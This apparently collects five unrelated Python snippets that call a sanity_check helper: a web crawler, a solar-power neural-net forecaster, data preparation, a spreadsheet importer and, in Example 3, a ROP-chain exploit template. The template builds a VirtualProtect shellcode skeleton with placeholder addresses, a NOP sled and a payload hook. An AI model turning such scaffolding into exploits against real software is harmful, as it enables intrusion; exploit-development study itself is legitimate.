Example 1
def __init__(self, url, url_count=None, timeout=3, multi=5, strict=False):
    if sanity_check(url, url_count, multi):
        self.crawler_queue = Queue.Queue()
        self.directory = {}  # directory structure of the crawled links
        self.root = url
        self.url_count = url_count  # max number of pages to crawl
        self.visits = set()  # visited pages; a set gives fast lookups
        self.timeout = timeout  # timeout for the page requests
        self.strict = strict  # strictly crawl same-domain URLs only
        self.multi = multi  # number of concurrent requests allowed
    else:
        # returning None from __init__ would not stop object creation,
        # so fail loudly instead
        raise ValueError("sanity_check failed for %r" % url)
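
sanity_check here is project-specific and not shown in the excerpt. A minimal sketch consistent with the call site (the validation rules and the urlparse-based check are assumptions, not the project's actual code):

def sanity_check(url, url_count, multi):
    # hypothetical argument validation inferred from the constructor
    from urlparse import urlparse  # Python 2, matching Queue.Queue above
    parsed = urlparse(url)
    if parsed.scheme not in ('http', 'https') or not parsed.netloc:
        return False  # root URL must be an absolute http(s) URL
    if url_count is not None and url_count <= 0:
        return False  # page limit, when given, must be positive
    if multi <= 0:
        return False  # concurrency level must be positive
    return True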
Example 2
def forecast_ann(df, forecast, day, seed, num_epochs):
    # don't try to predict pv at night!
    day_df = df[df['zenith'] < 87]
    # set up inputs
    input_df = ann_inputs(day_df)

    # set up output
    output_column = 'pv_power'
    output = day_df[output_column]
    # normalise the output (Y)
    output_max = output.max()
    if output_max > 0:
        output = output / output_max

    # smoothing the pv output first was tried, but it makes the fit worse:
    #   b = gaussian(39, 3)
    #   gf = filters.convolve1d(output.values, b/b.sum())
    #   output.update(gf)

    # normalise the inputs (X)
    input_max = utils.df_normalise(input_df)

    # sanity check the inputs
    utils.sanity_check(input_df)
    # sanity check the output
    if output.isna().sum() > 0:
        print("ERROR NaN in output")
        quit()

    inputs = torch.tensor(input_df.values.astype(np.float32))
    # .view reshapes the targets into an (n, 1) column vector
    targets = torch.tensor(output.values.astype(np.float32)).view(-1, 1)
    torch.manual_seed(seed)  # reproducible
    train_ds = TensorDataset(inputs, targets)

    # define the data loader
    batch_size = 100
    train_dl = DataLoader(train_ds, batch_size, shuffle=True)

    num_inputs = len(input_df.columns)
    # model using ANN
    model = SimpleNet(num_inputs, 1)

    # Define optimizer
    opt = torch.optim.SGD(model.parameters(), lr=1e-3)

    # define the loss function (L1 / mean absolute error)
    loss_fn = F.l1_loss

    # train the model
    losses = fit(num_epochs, model, loss_fn, opt, train_dl)
    print('Training loss: ', loss_fn(model(inputs), targets))
    # prediction: build the inputs for the requested forecast day
    forecast_day = forecast.loc[day.strftime('%Y-%m-%d')].copy()
    input_f = ann_inputs(forecast_day)
    # normalise the inputs (using same max as for the model)
    for column in input_f.columns:
        input_f[column] = input_f[column] / input_max[column]
    f_inputs = torch.tensor(input_f.values.astype(np.float32))
    preds = model(f_inputs)

    # denormalise the predictions using the maximum from the training data
    prediction_values = preds.detach().numpy() * output_max
    forecast_day['prediction'] = prediction_values
    # zero the prediction at night (zenith angle > 87 degrees)
    forecast_day.loc[forecast_day['zenith'] > 87, 'prediction'] = 0.0
    forecast.loc[day.strftime('%Y-%m-%d'),
                 'prediction'] = forecast_day['prediction'].values

    return losses
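
utils.df_normalise, utils.sanity_check and SimpleNet are defined elsewhere in this project. Sketches consistent with how they are used above (the hidden-layer size and the exact NaN policy are assumptions):

import torch.nn as nn

def df_normalise(df):
    # scale each column to [0, 1] in place and return the per-column
    # maxima, so the same scaling can be reapplied to the forecast inputs
    maxima = df.max()
    for column in df.columns:
        if maxima[column] > 0:
            df[column] = df[column] / maxima[column]
    return maxima

def sanity_check(df):
    # abort on NaN inputs, mirroring the NaN check on the output above
    for column in df.columns:
        if df[column].isna().sum() > 0:
            print("ERROR NaN in input column " + column)
            quit()

class SimpleNet(nn.Module):
    # a small feed-forward net; one hidden layer of 50 units is a guess
    def __init__(self, num_inputs, num_outputs):
        super(SimpleNet, self).__init__()
        self.net = nn.Sequential(
            nn.Linear(num_inputs, 50),
            nn.ReLU(),
            nn.Linear(50, num_outputs),
        )

    def forward(self, x):
        return self.net(x)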
Example 3
def get_rop_chain() -> bytes:
    # BOOL VirtualProtect(
    #   LPVOID lpAddress,
    #   SIZE_T dwSize,
    #   DWORD  flNewProtect,
    #   PDWORD lpflOldProtect
    # );
    #
    # Use the VirtualProtect skeleton (the alternatives below stay commented out):
    skeleton = RopChain()
    skeleton += 0x41414141                # VirtualProtect address
    skeleton += 0x42424242                # shellcode return address to return to after VirtualProtect is called
    skeleton += 0x43434343                # lpAddress (same as above)
    skeleton += 0x44444444                # dwSize (size of shellcode, 0x300 or so)
    skeleton += 0x45454545                # flNewProtect (0x40, PAGE_EXECUTE_READWRITE)
    skeleton += 0x46464646                # lpflOldProtect (some writable memory address)
    # -------------------------
    # -------------------------
    # LPVOID VirtualAlloc(
    #   LPVOID lpAddress,
    #   SIZE_T dwSize,
    #   DWORD  flAllocationType,
    #   DWORD  flProtect
    # );
    #
    # skeleton  = RopChain()
    # skeleton += 0x41414141                # VirtualAlloc address
    # skeleton += 0x42424242                # shellcode return address to return to after VirtualAlloc is called
    # skeleton += 0x43434343                # lpAddress (shellcode address)
    # skeleton += 0x44444444                # dwSize (0x1)
    # skeleton += 0x45454545                # flAllocationType (0x1000)
    # skeleton += 0x46464646                # flProtect (0x40)
    # -------------------------
    # -------------------------
    # BOOL WriteProcessMemory(
    #   HANDLE  hProcess,
    #   LPVOID  lpBaseAddress,
    #   LPCVOID lpBuffer,
    #   SIZE_T  nSize,
    #   SIZE_T  *lpNumberOfBytesWritten
    # );
    #
    # skeleton  = RopChain()
    # skeleton += 0x41414141                # WriteProcessMemory address
    # skeleton += 0x42424242                # shellcode return address to return to after WriteProcessMemory is called
    # skeleton += 0xffffffff                # hProcess (pseudo Process handle)
    # skeleton += 0x44444444                # lpBaseAddress (Code cave address)
    # skeleton += 0x45454545                # lpBuffer (shellcode address)
    # skeleton += 0x46464646                # nSize (size of shellcode)
    # skeleton += 0x47474747                # lpNumberOfBytesWritten (writable memory address, i.e. !dh -a MODULE)
    # -------------------------
    # -------------------------

    ropnop = 0x0          # address of a ret gadget (fill in per target)
    offset_to_eip = 0     # bytes of padding needed to reach the saved return address

    # pad up to EIP so the skeleton lands at the right offset
    rop = RopChain(chain=b'A' * (offset_to_eip - len(skeleton)))
    rop += skeleton.chain

    rop += 0x0            # gadget addresses get appended from here on
    ############################
    # EAX =>
    # EBX =>
    # ECX =>
    # EDX =>
    # ESI =>
    # EDI =>
    # -------------------------
    # skeleton[0] = 0x41414141
    # skeleton[1] = 0x42424242
    # skeleton[2] = 0x43434343
    # skeleton[3] = 0x44444444
    # skeleton[4] = 0x45454545
    # skeleton[5] = 0x46464646
    ############################

    rop += b'\x90' * 20   # short NOP sled leading into the payload
    rop += get_payload()

    sanity_check(rop.chain, bad_chars)

    return rop.chain
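
RopChain and this sanity_check come from the author's helper module. A minimal sketch that matches the usage above (the packing width, DWORD indexing and the exception type are assumptions):

import struct

class RopChain:
    def __init__(self, chain=b''):
        self.chain = chain

    def __iadd__(self, value):
        # ints are packed as little-endian DWORDs; bytes are appended as-is
        if isinstance(value, int):
            self.chain += struct.pack('<I', value)
        else:
            self.chain += value
        return self

    def __len__(self):
        return len(self.chain)

    def __setitem__(self, index, value):
        # patch the DWORD at slot `index`, as in `skeleton[0] = 0x41414141`
        offset = index * 4
        self.chain = (self.chain[:offset] + struct.pack('<I', value) +
                      self.chain[offset + 4:])

def sanity_check(chain, bad_chars):
    # fail fast if any bad character survived into the final chain
    for bad in bad_chars:
        if bad in chain:
            raise ValueError('bad char %#04x at offset %d' % (bad, chain.index(bad)))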
Example 4
print(label_encoder_train)

train_set = {}
for class_, path in zip(labels_train, data_train):
    # group sample paths by their encoded class label
    train_set.setdefault(label_encoder_train[class_], []).append(path)
print(train_set.keys())
data = train_set
del train_set
del keys_all_train
del label_encoder_train

print("Num classes for source domain datasets: " + str(len(data)))
print(data.keys())
data = utils.sanity_check(data)  # keep 200 labelled samples per class
print("Num classes with more than 200 samples: " + str(len(data)))

for class_ in data:
    for i in range(len(data[class_])):
        image_transpose = np.transpose(data[class_][i],
                                       (2, 0, 1))  # (9,9,100)-> (100,9,9)
        data[class_][i] = image_transpose

# source few-shot classification data
metatrain_data = data
print(len(metatrain_data.keys()), metatrain_data.keys())
del data

# source domain adaptation data
print(source_imdb['data'].shape)  # (77592, 9, 9, 100)
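
utils.sanity_check is the class-balancing step described by the surrounding comments. A sketch matching that description (the 200-sample threshold and the trimming are inferred from the comments, not confirmed):

def sanity_check(data):
    # drop classes with fewer than 200 samples and keep 200 per class
    checked = {}
    for class_, samples in data.items():
        if len(samples) >= 200:
            checked[class_] = samples[:200]
    return checked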
Example 5
    # get the material type
    _type = row[columns.index("PresType")].value
    try:
        pt = PresentationType.objects.get(name=_type)
    except PresentationType.DoesNotExist:
        print "Creating PresentationType: %s" % _type
        pt = PresentationType.objects.create(name=_type)

    kwargs['presentation_type'] = pt

    return kwargs

rows = get_rows('hub/imports/fixtures/2016Presentations.xlsx', '2016')

# run the sanity check first
skip_index_list = sanity_check(rows, columns, column_mappings)

print "importing presentations"

# re-read the rows: the sanity check pass consumed the row iterator
rows = get_rows('hub/imports/fixtures/2016Presentations.xlsx', '2016')
count = 0
for row in rows:

    """
    openpyxl returns incomplete rows, so I extend them here.
    """
    if len(row) < len(columns):
        class MockVal:
            def __init__(self, value):
                self.value = value
        new_row = []
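
The excerpt ends here. The sanity_check called above returns a skip_index_list that the import loop consumes; a hypothetical implementation consistent with that (the required-value rule and the dict-shaped column_mappings are assumptions):

def sanity_check(rows, columns, column_mappings):
    # collect the indices of rows whose mapped columns are missing values,
    # so the import loop can skip them
    skip_index_list = []
    for index, row in enumerate(rows):
        for column_name in column_mappings:
            if row[columns.index(column_name)].value is None:
                print "row %d is missing %s, will be skipped" % (index, column_name)
                skip_index_list.append(index)
                break
    return skip_index_list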